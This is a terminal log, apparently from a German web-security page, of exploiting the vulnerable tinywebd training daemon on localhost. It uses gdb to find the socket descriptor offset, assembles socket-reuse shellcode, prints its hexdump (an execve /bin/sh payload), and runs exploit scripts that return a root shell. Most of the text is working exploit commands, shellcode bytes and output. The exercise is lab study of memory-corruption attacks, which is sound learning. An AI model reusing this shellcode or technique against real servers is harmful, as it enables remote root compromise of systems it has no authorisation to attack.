root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root      2282  0.0  0.0   2180   368 ?        Ss   22:13   0:00 ./tinywebd
root      2837  0.0  0.0   5924   840 pts/1    S+   22:37   0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q -pid=2282 --symbols=./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
Attaching to process 2282
Load new symbol table from "/home/tomovic/Dokumente/hack/tinywebd"? (y or n) n
Nicht bestätigt.
(gdb) list handle_connection
77 /* This function handles the connection on the passed socket from the
78  * passed client address and logs to the passed FD. The connection is
79  * processed as a web request and this function replies over the connected
80  * socket.  Finally, the passed socket is closed at the end of the function.
81  */
82 void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
83    unsigned char *ptr, request[500], resource[500], log_buffer[500];
84    int fd, length;
85 
86    length = recv_line(sockfd, request);
(gdb) break 86
Haltepunkt 1 at 0x8048f80: file tinywebd.c, line 86.
(gdb) cont
Continuing.

Breakpoint 1, handle_connection (sockfd=10, client_addr_ptr=0xbffff6f8, logfd=3) at tinywebd.c:86
86    length = recv_line(sockfd, request);
(gdb) x/x &sockfd
0xbffff6d0: 0x0000000a
(gdb) x/x &new_sockfd
No symbol "new_sockfd" in current context.
(gdb) bt
#0  handle_connection (sockfd=10, client_addr_ptr=0xbffff6f8, logfd=3) at tinywebd.c:86
#1  0x08048f73 in main () at tinywebd.c:72
(gdb) select-frame 1
(gdb) x/x &new_sockfd
0xbffff71c: 0x0000000a
(gdb) quit
A debugging session is active.

 Inferior 1 [process 2282] will be detached.
 
Quit anyway? (y or n) y
Detaching from program: /home/tomovic/Dokumente/hack/tinywebd, process 2282


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0xbffff71c - 0xbffff6d0
$1 = 0x4c
(gdb) quit

Bitte ändert die Werte in der .s Datei
   push 0x08048fb7      ; return address

   lea edx, [esp+0x4c]  ; put the address of new_sockfd in edx

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm socket_reuse_restore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C socket_reuse_restore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X....t..l$hh..|
00000010  04 08 c3 8d 54 24 5c 8b  1a 6a 02 59 31 c0 31 d2  |....T$\..j.Y1.1.|
00000020  b0 3f cd 80 49 79 f9 b0  0b 52 68 2f 2f 73 68 68  |.?..Iy...Rh//shh|
00000030  2f 62 69 6e 89 e3 52 89  e2 53 89 e1 cd 80        |/bin..R..S....|
0000003e
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chmod a+x ./xt_reuse.sh
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh socket_reuse_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: socket_reuse_restore (62 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 307] [shellcode 62] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root
---------------- Terminal 2

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_slient.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root      3023  0.0  0.0   5924   840 pts/2    S+   22:53   0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

   

Websicherheit...  

   
© ALLROUNDER